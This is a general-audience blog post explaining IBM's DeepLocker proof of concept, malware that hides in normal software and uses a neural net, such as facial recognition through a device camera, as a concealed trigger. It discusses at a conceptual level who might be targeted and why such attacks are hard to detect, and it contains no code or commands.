Hacking Your Face

Okay, so that’s a bit of an ambiguous title. I don’t mean using tricks to make yourself look better or hitting yourself in the face with a meat cleaver. What I’m referring to is a new form of malware that actually uses your computer or device’s camera to look at you and identify you before it begins to hack you. It’s a pretty scary scenario that has now become reality. Welcome to the new era of hacking.

As the cyber world evolves into the artificial intelligence (AI) realm, so too does hacking. For now, such AI-assisted malware is in the infancy stage; however, a proof-of-concept AI malware package called, DeepLocker, has been developed by IBM researchers. DeepLocker is malware which does not deploy until it finds a specific victim. The identification of this victim relies on AI, neural net properties. The use of a neural network by malware would, according to the researchers, make the malware’s detection more difficult.

Defense against most malware is based on analyzing its composition and matching that against known patterns. Malware, therefore, tries to find ways to hide these patterns to avoid detection. Well-designed malware will not deploy unless it detects a safe environment. For example, malware will scan a network it has infiltrated to see if there is any indication of a sandbox or if it has been lured into a honeypot. If the malware finds something suspicious, it won’t deploy. Once deployed, however, the malware gives away information about its design, after which, anti-malware architecture is updated.

As an example, notice how the famous Stuxnet worm inspected the network before it determined what to do next. (Stages 2 and 3 below)

stuxnet-diagram

DeepLocker hides itself in normal-looking software. The software may act normally unless certain trigger conditions are present. These triggers can be any number of things, such as matching GPS locations or voice recognition, but, for the purpose of this article, I’ll focus on facial recognition.

Neural networks are pattern recognizers. They can be trained to identify certain patterns, such as faces. If the neural network integrated with the malware was pre-trained to recognize a particular face, it would only trigger the associated malware to deploy when that pattern, that face, was recognized. To do this, the malware would need to have access to the device’s camera. Thus, any software that required the use of a camera, such as video calling/conferencing software, would be an ideal package for this type of malware.

The problem comes with trying to defend against this type of malware. The only ones who know the raison d’etre of the neural net pattern associated with the malware are those who created the malware. It cannot be back-engineered by the attacked network. Even the connection of the trigger to the malware can be encrypted or otherwise obfuscated. In short, it would be very difficult to conclude that an attack was underway or that one even took place. Here is a diagram showing the concealment such malware can use.

deeplocker hide

If malware like DeepLocker wanted to target you, it would first need to get you to download and install a specific type of software that would enable it to have access to the pattern it was designed to look for. It could, theoretically, do this through a fake update of software that is already installed on your device. The attacker could, if advanced enough, scan your system or network to see what software avenues are available. It could then develop a recognition pattern that would make use of the previously installed software. It could, for instance, develop a voice or facial recognition neural net pattern that used your pre-installed video chat program and use that program to target you.

The best way to develop such malware would be to train the neural net through direct communication with the victim. This would enable the attacker to record the interaction and, thus, obtain sufficient data to train the net for a future attack. That said, few people would accept a video call from a stranger. Malware that takes control of a device’s camera and microphone is readily available, but this could be detected by security architecture. The only way to train the neural net without infiltrating the network or device is to use publicly available videos and photos. Thus, the greater online presence you have, the more susceptible you would be to such an attack.

It should be noted that no such attacks have been detected in the wild. That said, how would they be detected? The malware would only be vulnerable to defense strategies in the earliest stages of an attack. However, those who would design such a targeted attack would be those who had access to multiple cyber attack resources and were in a position to obfuscate all stages of such an attack. That’s right. Most of these attacks would tend to come from nation states because the resources and knowledge it would take to develop them would be beyond that of most unaffiliated hackers.

So, if these attacks were developed, they would not be widely distributed, at least at the beginning. Only high profile targets who had a substantial online presence would be victimized. A substantial online presence would be necessary to develop a training set for the neural net. The target would need to possess valuable information or data that would be worth all the time it would take to design the attack. So if you fit this profile you may want to begin your defense by at least putting some tape over the camera lens on your laptop and disabling your microphone.

It would not surprise me if intelligence agencies already possessed such malware, but if they don’t, they soon will. Low profile, highly secured but valuable targets may still get hacked using such malware but this would require advanced attack techniques. For example, the time is not far off when someone could call a target using voice simulation software that makes them appear to be someone the target knows. This could be a way to gather voice samples from the target that they could then use to train a neural net for a future attack. As is often the case, the cybersecurity community has been put on the back foot by this new attack vector. At least for a while, the defense against AI attacks, like DeepLocker will be more reactive than proactive. Efforts are being made to decode neural nets before they deploy, but major attacks using this vector will succeed long before such defenses are developed. For those in the cybersecurity community, there are some hard times ahead.

About Steve Mierzejewski

Marketing consultant for InZero Systems, developer of the next generation in hardware-separated security, WorkPlay Technologies, TrustWall and Mobile bare-metal virtualization. I've worked in Poland, Japan, Korea, China, and Afghanistan. I'm a writer, technical editor, and an educator. I also do some work as a test developer for Michigan State University.
This entry was posted in Uncategorized and tagged , , . Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s